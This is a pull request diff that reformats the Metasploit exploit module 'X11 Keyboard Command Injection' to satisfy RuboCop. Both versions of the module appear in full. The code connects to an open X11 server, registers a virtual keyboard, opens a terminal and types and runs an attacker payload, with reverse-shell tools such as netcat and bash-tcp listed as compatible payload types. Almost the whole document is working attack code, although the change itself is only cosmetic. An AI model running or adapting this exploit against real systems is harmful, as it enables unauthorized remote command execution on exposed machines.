### PR TITLE
modules/exploits/unix/x11: Resolve RuboCop violations

### DIFF
--- a/modules/exploits/unix/x11/x11_keyboard_exec.rb
+++ b/modules/exploits/unix/x11/x11_keyboard_exec.rb
@@ -73,49 +73,52 @@ class MetasploitModule < Msf::Exploit::Remote
     'f2' => "\x44"
   }
 
-
   def initialize(info = {})
-    super(update_info(info,
-      'Name'            => 'X11 Keyboard Command Injection',
-      'Description'     => %q{
-        This module exploits open X11 servers by connecting and registering a
-        virtual keyboard. The virtual keyboard is used to open an xterm or gnome
-        terminal and type and execute the specified payload.
-      },
-      'Author'          =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'X11 Keyboard Command Injection',
+        'Description' => %q{
+          This module exploits open X11 servers by connecting and registering a
+          virtual keyboard. The virtual keyboard is used to open an xterm or gnome
+          terminal and type and execute the specified payload.
+        },
+        'Author' => [
           'xistence <xistence[at]0x90.nl>'
         ],
-      'Privileged'      => false,
-      'License'         => MSF_LICENSE,
-      'Payload'         =>
-        {
+        'Privileged' => false,
+        'License' => MSF_LICENSE,
+        'Payload' => {
           'DisableNops' => true,
-          'Compat'      =>
-            {
-              'PayloadType' => 'cmd cmd_bash',
-              'RequiredCmd' => 'gawk bash-tcp python netcat'
-            }
+          'Compat' => {
+            'PayloadType' => 'cmd cmd_bash',
+            'RequiredCmd' => 'gawk bash-tcp python netcat'
+          }
         },
-      'Platform'        => ['unix'],
-      'Arch'            => ARCH_CMD,
-      'Targets'         =>
-        [
-          [ 'xterm (Generic)', {}],
-          [ 'gnome-terminal (Ubuntu)', {}],
-        ],      'DisclosureDate'  => '2015-07-10',
-      'DefaultTarget'   => 0))
+        'Platform' => ['unix'],
+        'Arch' => ARCH_CMD,
+        'Targets' => [
+          ['xterm (Generic)', {}],
+          ['gnome-terminal (Ubuntu)', {}],
+        ],
+        'DisclosureDate' => '2015-07-10',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [SCREEN_EFFECTS],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
 
-    register_options(
-      [
-        Opt::RPORT(6000),
-        OptInt.new('TIME_WAIT', [ true, 'Time to wait for opening GUI windows in seconds', 5])
-      ])
+    register_options([
+      Opt::RPORT(6000),
+      OptInt.new('TIME_WAIT', [ true, 'Time to wait for opening GUI windows in seconds', 5])
+    ])
   end
 
-
   def xkeyboard_key
-    req = ""
+    req = ''
     req << @xkeyboard_opcode
     req << "\x05" # Extension minor: 5 (LatchLockState)
     req << "\x04\x00" # Request length: 4
@@ -132,9 +135,7 @@ class MetasploitModule < Msf::Exploit::Remote
     return req
   end
 
-
   def press_key(key)
-
     req = xkeyboard_key
 
     req << @xtest_opcode
@@ -147,8 +148,8 @@ class MetasploitModule < Msf::Exploit::Remote
     req << "\x00\x00\x00\x00" # Root
     req << "\x07\x00\x07\x00" # Unused?
     req << "\x88\x04\x02\x00" # Unused?
-    #req << "\x00\x01" # rootX: 256
-    #req << "\xf5\x05" # rootY: 1525
+    # req << "\x00\x01" # rootX: 256
+    # req << "\xf5\x05" # rootY: 1525
     req << "\x00\x00" # rootX: 0
     req << "\x00\x00" # rootY: 0
     req << "\x00\x00\x00\x00" # Unused?
@@ -166,14 +167,12 @@ class MetasploitModule < Msf::Exploit::Remote
     res = sock.get_once
 
     # Response should give 1 on first byte (Success)
-    unless res && res[0,1] == "\x01"
+    unless res && res[0, 1] == "\x01"
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Error pressing key: #{key} #{res.inspect}")
     end
-
   end
 
   def release_key(key)
-
     req = xkeyboard_key
 
     req << @xtest_opcode
@@ -186,8 +185,8 @@ class MetasploitModule < Msf::Exploit::Remote
     req << "\x00\x00\x00\x00" # Root
     req << "\x07\x00\x07\x00" # Unused?
     req << "\x88\x04\x02\x00" # Unused?
-    #req << "\x00\x01" # rootX: 256
-    #req << "\xf5\x05" # rootY: 1525
+    # req << "\x00\x01" # rootX: 256
+    # req << "\xf5\x05" # rootY: 1525
     req << "\x00\x00" # rootX: 0
     req << "\x00\x00" # rootY: 0
     req << "\x00\x00\x00\x00" # Unused?
@@ -205,10 +204,9 @@ class MetasploitModule < Msf::Exploit::Remote
     res = sock.get_once
 
     # Response should give 1 on first byte (Success)
-    unless res && res[0,1] == "\x01"
+    unless res && res[0, 1] == "\x01"
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Error releasing key: #{key} #{res.inspect}")
     end
-
   end
 
   def type_command(command)
@@ -219,15 +217,15 @@ class MetasploitModule < Msf::Exploit::Remote
       key = KB_KEYS[value]
       # Special keys need a shift pressed to be typed
       if Regexp.union(specialkeys) =~ value
-        press_key(KB_KEYS["lshift"]) # [lshift]
+        press_key(KB_KEYS['lshift']) # [lshift]
         press_key(key)
-        release_key(KB_KEYS["lshift"])
+        release_key(KB_KEYS['lshift'])
         release_key(key)
       # Uppercase characters need to be converted to lowercase and be typed in combination with the shift key to generate uppercase
       elsif value =~ /[A-Z]/
-        press_key(KB_KEYS["lshift"]) # [lshift]
+        press_key(KB_KEYS['lshift']) # [lshift]
         press_key(KB_KEYS[value.downcase])
-        release_key(KB_KEYS["lshift"])
+        release_key(KB_KEYS['lshift'])
         release_key(KB_KEYS[value.downcase])
       # All normal keys which are not special keys or uppercase characters
       else
@@ -242,250 +240,238 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def send_msg(sock, data)
     sock.put(data)
-    data = ""
+    data = ''
     begin
       read_data = sock.get_once(-1, 1)
-      while not read_data.nil?
+      until read_data.nil?
         data << read_data
         read_data = sock.get_once(-1, 1)
       end
-    rescue EOFError
+    rescue EOFError => e
+      vprint_error(e.message)
     end
     data
   end
 
   def exploit
+    connect
 
-    begin
-      connect
+    print_status("#{rhost}:#{rport} - Register keyboard")
 
-      print_status("#{rhost}:#{rport} - Register keyboard")
+    req = "\x6c" # Byte order (Little-Endian)
+    req << "\x00" # Unused
+    req << "\x0b\x00" # Protocol major version: 11
+    req << "\x00\x00" # Protocol minor version: 0
+    req << "\x00\x00" # Authorization protocol name length: 0
+    req << "\x00\x00" # Authorization protocol data length: 0
+    req << "\x00\x00" # Unused
 
-      req = "\x6c" # Byte order (Little-Endian)
-      req << "\x00" # Unused
-      req << "\x0b\x00" # Protocol major version: 11
-      req << "\x00\x00" # Protocol minor version: 0
-      req << "\x00\x00" # Authorization protocol name length: 0
-      req << "\x00\x00" # Authorization protocol data length: 0
-      req << "\x00\x00" # Unused
+    # Retrieve the whole X11 details response
+    res = send_msg(sock, req)
 
-     # Retrieve the whole X11 details response
-      res = send_msg(sock,req)
-
-      # Response should give 0x01 in first byte (Success)
-      unless res && res[0,1] == "\x01"
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - X11 initial communication failed")
-      end
-
-
-      # Keyboard registration
-      req = "\x62" # Opcode 98: QueryExtension
-      req << "\x00" # Unused
-      req << "\x05\x00" # Request length: 5
-      req << "\x09\x00" # Name length: 9
-      req << "\x60\x03" # Unused?
-      req << "XKEYBOARD" # Name
-      req << "\x00\x00\x00" # Unused, padding?
-
-      # Retrieve the whole X11 details response
-      res = send_msg(sock,req)
-
-      # Response should give 0x01 in first byte (Success)
-      if res && res[0,1] == "\x01"
-        @xkeyboard_opcode = res[9,1] # Retrieve the XKEYBOARD opcode
-      else
-        #puts res.inspect
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - X11 Request QueryExtension (opcode 98) XKEYBOARD failed")
-      end
-
-
-      req = ""
-      req << @xkeyboard_opcode
-      req << "\x00" # Extension minor: 0 (UseExtension)
-      req << "\x02\x00" # Request length: 2
-      req << "\x01\x00" # Wanted Major: 1
-      req << "\x00\x00" # Wanted Minor: 0
-
-      # Retrieve the whole X11 details response
-      res = send_msg(sock,req)
-
-      unless res && res[0,1] == "\x01"
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - X11 Request XKEYBOARD (opcode 136) failed -")
-      end
-
-
-      req = "\x62" # Opcode 98: QueryExtension
-      req << "\x00" # Unused
-      req << "\x06\x00" # Request length: 6
-      req << "\x0f\x00" # Name length: 15
-      req << "\x00\x00" # Unused
-      req << "XInputExtension" # Name
-      req << "\x00" # Unused, padding?
-
-      # Retrieve the whole X11 details response
-      res = send_msg(sock,req)
-
-      # Response should give 0x01 in first byte (Success)
-      unless res && res[0,1] == "\x01"
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - X11 Request QueryExtension (opcode 98) XInputExtension failed")
-      end
-
-
-      req = "\x62" # Opcode 98: QueryExtension
-      req << "\x00" # Unused
-      req << "\x04\x00" # Request length: 4
-      req << "\x05\x00" # Name length: 5
-      req << "\x00\x00" # Unused
-      req << "XTEST" # Name
-      req << "\x00\x00\x00" # Unused, padding?
-
-      # Retrieve the whole X11 details response
-      res = send_msg(sock,req)
-
-      # Response should give 0x01 in first byte (Success)
-      if res && res[0,1] == "\x01"
-        @xtest_opcode = res[9,1] # Retrieve the XTEST opcode
-      else
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - X11 Request QueryExtension (opcode 98) XTEST failed")
-      end
-
-
-      req = "\x62" # Opcode 98: QueryExtension
-      req << "\x00" # Unused
-      req << "\x08\x00" # Request length
-      req << "\x17\x00" # Name length
-      req << "\x00\x00" # Unused
-      req << "Generic Event Extension" # Name
-      req << "\x00" # Unused, padding?
-
-      # Retrieve the whole X11 details response
-      res = send_msg(sock,req)
-
-      # Response should give 0x01 in first byte (Success)
-      if res && res[0,1] == "\x01"
-        @genericevent_opcode = res[9,1] # Retrieve the Generic Event Extension opcode
-      else
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - X11 Request QueryExtension (opcode 98) Generic Event Extension failed")
-      end
-
-
-      req = ""
-      req << @genericevent_opcode
-      req << "\x00" # Extension minor: 0 (QueryVersion)
-      req << "\x02\x00" # Request length: 2
-      req << "\x01\x00" # Client major version: 1
-      req << "\x00\x00" # Client minor version: 0
-
-      # Retrieve the whole X11 details response
-      res = send_msg(sock,req)
-
-      # Response should give 0x01 in first byte (Success)
-      unless res && res[0,1] == "\x01"
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - X11 Request XKEYBOARD failed")
-      end
-
-
-      req = ""
-      req << @xtest_opcode
-      req << "\x00" # Extension minor: 0 (GetVersion)
-      req << "\x02\x00" # Request length: 2
-      req << "\x02\x00" # Major version: 2
-      req << "\x02\x00" # Minor version: 2
-
-      # Retrieve the whole X11 details response
-      res = send_msg(sock,req)
-
-      # Response should give 0x01 in first byte (Success)
-      unless res && res[0,1] == "\x01"
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - X11 Request XTEST failed")
-      end
-
-
-      req = "\x65" # Opcode 101: GetKeyboardMapping
-      req << "\x00" # Unused
-      req << "\x02\x00" # Request length: 2
-      req << "\x08" # First keycode: 8
-      req << "\xf8" # Count: 248
-      req << "\x02\x00" # Unused?
-
-      # Retrieve the whole X11 details response
-      res = send_msg(sock,req)
-
-      # Response should give 0x01 in first byte (Success)
-      unless res && res[0,1] == "\x01"
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - X11 Request GetKeyboardMapping (opcode 101) failed")
-      end
-
-
-      req = ""
-      req << @xkeyboard_opcode
-      req << "\x08" # Extension minor: 8 (GetMap)
-      req << "\x07\x00" # Request length: 7
-      req << "\x00\x01" # Device spec: 0x0100 (256)
-      req << "\x07\x00" # Full: 7
-      req << "\x00\x00" # Partial: 0
-      req << "\x00" # firsType: 0
-      req << "\x00" # nTypes: 0
-      req << "\x00" # firstKeySym: 0
-      req << "\x00" # nKeySym: 0
-      req << "\x00" # firstKeyAction: 0
-      req << "\x00" # nKeysActions: 0
-      req << "\x00" # firstKeyBehavior: 0
-      req << "\x00" # nKeysBehavior: 0
-      req << "\x00\x00" # virtualMods: 0
-      req << "\x00" # firstKeyExplicit: 0
-      req << "\x00" # nKeyExplicit: 0
-      req << "\x00" # firstModMapKey: 0
-      req << "\x00" # nModMapKeys: 0
-      req << "\x00" # firstVModMapKey: 0
-      req << "\x00" # nVModMapKeys: 0
-      req << "\x00\x00" # Unused, padding?
-
-      # Retrieve the whole X11 details response
-      res = send_msg(sock,req)
-
-      # Response should give 0x01 in first byte (Success)
-      unless res && res[0,1] == "\x01"
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - X11 Request XKEYBOARD failed")
-      end
-
-
-      # Press ALT+F2 to start up "Run application"
-      print_status("#{rhost}:#{rport} - Opening \"Run Application\"")
-      press_key(KB_KEYS["alt"])
-      press_key(KB_KEYS["f2"])
-      release_key(KB_KEYS["alt"])
-      release_key(KB_KEYS["f2"])
-
-      # Wait X seconds to open the dialog
-      print_status("#{rhost}:#{rport} - Waiting #{datastore['TIME_WAIT']} seconds...")
-      Rex.sleep(datastore['TIME_WAIT'])
-
-      if datastore['TARGET'] == 0
-        # Start a xterm terminal
-        print_status("#{rhost}:#{rport} - Opening xterm")
-        type_command("xterm")
-      else
-        # Start a Gnome terminal
-        print_status("#{rhost}:#{rport} - Opening gnome-terminal")
-        type_command("gnome-terminal")
-      end
-
-      print_status("#{rhost}:#{rport} - Waiting #{datastore['TIME_WAIT']} seconds...")
-      # Wait X seconds to open the terminal
-      Rex.sleep(datastore['TIME_WAIT'])
-
-      # "Type" our payload and execute it
-      print_status("#{rhost}:#{rport} - Typing and executing payload")
-      command = "nohup #{payload.encoded} &2>/dev/null; sleep 1; exit"
-
-      type_command(command)
-
-      handler
-    rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e
-      print_error("#{rhost}:#{rport} - #{e.message}")
-    ensure
-      disconnect
+    # Response should give 0x01 in first byte (Success)
+    unless res && res[0, 1] == "\x01"
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - X11 initial communication failed")
     end
+
+    # Keyboard registration
+    req = "\x62" # Opcode 98: QueryExtension
+    req << "\x00" # Unused
+    req << "\x05\x00" # Request length: 5
+    req << "\x09\x00" # Name length: 9
+    req << "\x60\x03" # Unused?
+    req << 'XKEYBOARD' # Name
+    req << "\x00\x00\x00" # Unused, padding?
+
+    # Retrieve the whole X11 details response
+    res = send_msg(sock, req)
+
+    # Response should give 0x01 in first byte (Success)
+    if res && res[0, 1] == "\x01"
+      @xkeyboard_opcode = res[9, 1] # Retrieve the XKEYBOARD opcode
+    else
+      # puts res.inspect
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - X11 Request QueryExtension (opcode 98) XKEYBOARD failed")
+    end
+
+    req = ''
+    req << @xkeyboard_opcode
+    req << "\x00" # Extension minor: 0 (UseExtension)
+    req << "\x02\x00" # Request length: 2
+    req << "\x01\x00" # Wanted Major: 1
+    req << "\x00\x00" # Wanted Minor: 0
+
+    # Retrieve the whole X11 details response
+    res = send_msg(sock, req)
+
+    unless res && res[0, 1] == "\x01"
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - X11 Request XKEYBOARD (opcode 136) failed -")
+    end
+
+    req = "\x62" # Opcode 98: QueryExtension
+    req << "\x00" # Unused
+    req << "\x06\x00" # Request length: 6
+    req << "\x0f\x00" # Name length: 15
+    req << "\x00\x00" # Unused
+    req << 'XInputExtension' # Name
+    req << "\x00" # Unused, padding?
+
+    # Retrieve the whole X11 details response
+    res = send_msg(sock, req)
+
+    # Response should give 0x01 in first byte (Success)
+    unless res && res[0, 1] == "\x01"
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - X11 Request QueryExtension (opcode 98) XInputExtension failed")
+    end
+
+    req = "\x62" # Opcode 98: QueryExtension
+    req << "\x00" # Unused
+    req << "\x04\x00" # Request length: 4
+    req << "\x05\x00" # Name length: 5
+    req << "\x00\x00" # Unused
+    req << 'XTEST' # Name
+    req << "\x00\x00\x00" # Unused, padding?
+
+    # Retrieve the whole X11 details response
+    res = send_msg(sock, req)
+
+    # Response should give 0x01 in first byte (Success)
+    if res && res[0, 1] == "\x01"
+      @xtest_opcode = res[9, 1] # Retrieve the XTEST opcode
+    else
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - X11 Request QueryExtension (opcode 98) XTEST failed")
+    end
+
+    req = "\x62" # Opcode 98: QueryExtension
+    req << "\x00" # Unused
+    req << "\x08\x00" # Request length
+    req << "\x17\x00" # Name length
+    req << "\x00\x00" # Unused
+    req << 'Generic Event Extension' # Name
+    req << "\x00" # Unused, padding?
+
+    # Retrieve the whole X11 details response
+    res = send_msg(sock, req)
+
+    # Response should give 0x01 in first byte (Success)
+    if res && res[0, 1] == "\x01"
+      @genericevent_opcode = res[9, 1] # Retrieve the Generic Event Extension opcode
+    else
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - X11 Request QueryExtension (opcode 98) Generic Event Extension failed")
+    end
+
+    req = ''
+    req << @genericevent_opcode
+    req << "\x00" # Extension minor: 0 (QueryVersion)
+    req << "\x02\x00" # Request length: 2
+    req << "\x01\x00" # Client major version: 1
+    req << "\x00\x00" # Client minor version: 0
+
+    # Retrieve the whole X11 details response
+    res = send_msg(sock, req)
+
+    # Response should give 0x01 in first byte (Success)
+    unless res && res[0, 1] == "\x01"
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - X11 Request XKEYBOARD failed")
+    end
+
+    req = ''
+    req << @xtest_opcode
+    req << "\x00" # Extension minor: 0 (GetVersion)
+    req << "\x02\x00" # Request length: 2
+    req << "\x02\x00" # Major version: 2
+    req << "\x02\x00" # Minor version: 2
+
+    # Retrieve the whole X11 details response
+    res = send_msg(sock, req)
+
+    # Response should give 0x01 in first byte (Success)
+    unless res && res[0, 1] == "\x01"
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - X11 Request XTEST failed")
+    end
+
+    req = "\x65" # Opcode 101: GetKeyboardMapping
+    req << "\x00" # Unused
+    req << "\x02\x00" # Request length: 2
+    req << "\x08" # First keycode: 8
+    req << "\xf8" # Count: 248
+    req << "\x02\x00" # Unused?
+
+    # Retrieve the whole X11 details response
+    res = send_msg(sock, req)
+
+    # Response should give 0x01 in first byte (Success)
+    unless res && res[0, 1] == "\x01"
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - X11 Request GetKeyboardMapping (opcode 101) failed")
+    end
+
+    req = ''
+    req << @xkeyboard_opcode
+    req << "\x08" # Extension minor: 8 (GetMap)
+    req << "\x07\x00" # Request length: 7
+    req << "\x00\x01" # Device spec: 0x0100 (256)
+    req << "\x07\x00" # Full: 7
+    req << "\x00\x00" # Partial: 0
+    req << "\x00" # firsType: 0
+    req << "\x00" # nTypes: 0
+    req << "\x00" # firstKeySym: 0
+    req << "\x00" # nKeySym: 0
+    req << "\x00" # firstKeyAction: 0
+    req << "\x00" # nKeysActions: 0
+    req << "\x00" # firstKeyBehavior: 0
+    req << "\x00" # nKeysBehavior: 0
+    req << "\x00\x00" # virtualMods: 0
+    req << "\x00" # firstKeyExplicit: 0
+    req << "\x00" # nKeyExplicit: 0
+    req << "\x00" # firstModMapKey: 0
+    req << "\x00" # nModMapKeys: 0
+    req << "\x00" # firstVModMapKey: 0
+    req << "\x00" # nVModMapKeys: 0
+    req << "\x00\x00" # Unused, padding?
+
+    # Retrieve the whole X11 details response
+    res = send_msg(sock, req)
+
+    # Response should give 0x01 in first byte (Success)
+    unless res && res[0, 1] == "\x01"
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - X11 Request XKEYBOARD failed")
+    end
+
+    # Press ALT+F2 to start up "Run application"
+    print_status("#{rhost}:#{rport} - Opening \"Run Application\"")
+    press_key(KB_KEYS['alt'])
+    press_key(KB_KEYS['f2'])
+    release_key(KB_KEYS['alt'])
+    release_key(KB_KEYS['f2'])
+
+    # Wait X seconds to open the dialog
+    print_status("#{rhost}:#{rport} - Waiting #{datastore['TIME_WAIT']} seconds...")
+    Rex.sleep(datastore['TIME_WAIT'])
+
+    if datastore['TARGET'] == 0
+      # Start a xterm terminal
+      print_status("#{rhost}:#{rport} - Opening xterm")
+      type_command('xterm')
+    else
+      # Start a Gnome terminal
+      print_status("#{rhost}:#{rport} - Opening gnome-terminal")
+      type_command('gnome-terminal')
+    end
+
+    print_status("#{rhost}:#{rport} - Waiting #{datastore['TIME_WAIT']} seconds...")
+    # Wait X seconds to open the terminal
+    Rex.sleep(datastore['TIME_WAIT'])
+
+    # "Type" our payload and execute it
+    print_status("#{rhost}:#{rport} - Typing and executing payload")
+    command = "nohup #{payload.encoded} &2>/dev/null; sleep 1; exit"
+
+    type_command(command)
+
+    handler
+  rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e
+    print_error("#{rhost}:#{rport} - #{e.message}")
+  ensure
+    disconnect
   end
 end


### PR DESCRIPTION
Most violations resolved with `rubocop -a`, except notes.
